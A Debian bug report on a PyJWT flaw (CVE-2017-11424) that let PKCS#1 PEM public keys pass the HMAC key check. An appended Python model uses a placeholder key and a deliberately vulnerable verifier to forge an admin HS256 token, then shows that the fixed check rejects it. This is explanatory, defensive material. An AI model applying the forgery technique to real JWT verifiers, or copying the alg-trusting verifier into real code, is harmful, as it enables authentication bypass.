[Python-modules-team] Bug#873244: pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys
carnil at debian.org
Fri Aug 25 18:59:33 UTC 2017
Tags: security patch upstream
Control: found -1 0.2.1-1+deb8u1
The following vulnerability was published for pyjwt.
| In PyJWT 1.5.0 and below the `invalid_strings` check in
| `HMACAlgorithm.prepare_key` does not account for all PEM encoded
| public keys. Specifically, the PKCS1 PEM encoded format would be
| allowed because it is prefaced with the string `-----BEGIN RSA PUBLIC
| KEY-----` which is not accounted for. This enables
| symmetric/asymmetric key confusion attacks against users using the
| PKCS1 PEM encoded public keys, which would allow an attacker to craft
| JWTs from scratch.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
Please adjust the affected versions in the BTS as needed. I think this
should be present as well in 0.2.1-1+deb8u1.
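An added example, not PyJWT's code and not part of this bug report: a stdlib-only model of HS256 signing and verification in which the verifier, following the pattern the CVE text describes, dispatches on the token's `alg` header and runs whatever key the caller configured through a `prepare_key`-style substring check. The two prefix lists, the placeholder PKCS#1 PEM body and every function name are assumptions: the shorter list approximates the shape of the pre-fix check, the longer one adds the `-----BEGIN RSA PUBLIC KEY-----` header the fix accounts for. It shows that an attacker holding only the server's PKCS#1-encoded public key can forge an HS256 token the unfixed check accepts, and that the extended check rejects it.

```python
import base64
import hashlib
import hmac
import json

# Constructed placeholder, not a real key: only the header line matters for the
# prefix check, and HMAC treats the whole string as opaque key bytes.
PKCS1_PUBLIC_KEY_PEM = (
    "-----BEGIN RSA PUBLIC KEY-----\n"
    "MIIBCgKCAQEAconstructedplaceholderkeybody0123456789abcdef\n"
    "-----END RSA PUBLIC KEY-----\n"
)

# Byte strings that must never appear in an HMAC key: a PEM public key or
# certificate reaching the HMAC verifier means asymmetric and symmetric
# algorithms have been confused. The short list approximates the pre-fix
# check (assumption); the long list adds the PKCS#1 header the fix covers.
INVALID_STRINGS_BEFORE = (
    b"-----BEGIN PUBLIC KEY-----",
    b"-----BEGIN CERTIFICATE-----",
    b"ssh-rsa",
)
INVALID_STRINGS_AFTER = INVALID_STRINGS_BEFORE + (
    b"-----BEGIN RSA PUBLIC KEY-----",
)


class InvalidKeyError(ValueError):
    """Raised when a key that looks like public-key material is offered to HMAC."""


def prepare_hmac_key(key, invalid_strings):
    # Mirrors the role of HMACAlgorithm.prepare_key: normalise to bytes, then
    # refuse anything that carries a known public-key marker.
    if isinstance(key, str):
        key = key.encode("utf-8")
    if any(marker in key for marker in invalid_strings):
        raise InvalidKeyError("public key material offered as an HMAC secret")
    return key


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(payload: dict, key: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_token(public_key_pem: str, payload: dict) -> str:
    # Attacker side: knows only the server's public key and uses it as the
    # HMAC secret, betting the server will verify with the same bytes.
    return hs256_sign(payload, public_key_pem.encode("utf-8"))


def verify_hs256(token: str, configured_key, invalid_strings) -> dict:
    # Server side: the algorithm is taken from the untrusted header, so the
    # configured (public) key is handed to the HMAC path and only prepare_key
    # stands between the attacker and a valid signature.
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("only HS256 is modelled here")
    hmac_key = prepare_hmac_key(configured_key, invalid_strings)
    expected = hmac.new(
        hmac_key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def attack_outcome(invalid_strings) -> str:
    # Runs the confusion attack against a verifier using the given check and
    # reports whether the forged token was accepted or the key was rejected.
    token = forge_token(PKCS1_PUBLIC_KEY_PEM, {"sub": "admin"})
    try:
        claims = verify_hs256(token, PKCS1_PUBLIC_KEY_PEM, invalid_strings)
    except InvalidKeyError:
        return "rejected"
    return "accepted:" + claims["sub"]


if __name__ == "__main__":
    print("pre-fix check :", attack_outcome(INVALID_STRINGS_BEFORE))
    print("post-fix check:", attack_outcome(INVALID_STRINGS_AFTER))
```

The substring check is a backstop, not the primary defence: a verifier should pin the expected algorithm on the caller side (PyJWT's `jwt.decode` takes an `algorithms` list for this) so that a token's `alg` header can never select HMAC when an RSA key was configured, and the prefix list only catches the cases where that pinning was forgotten.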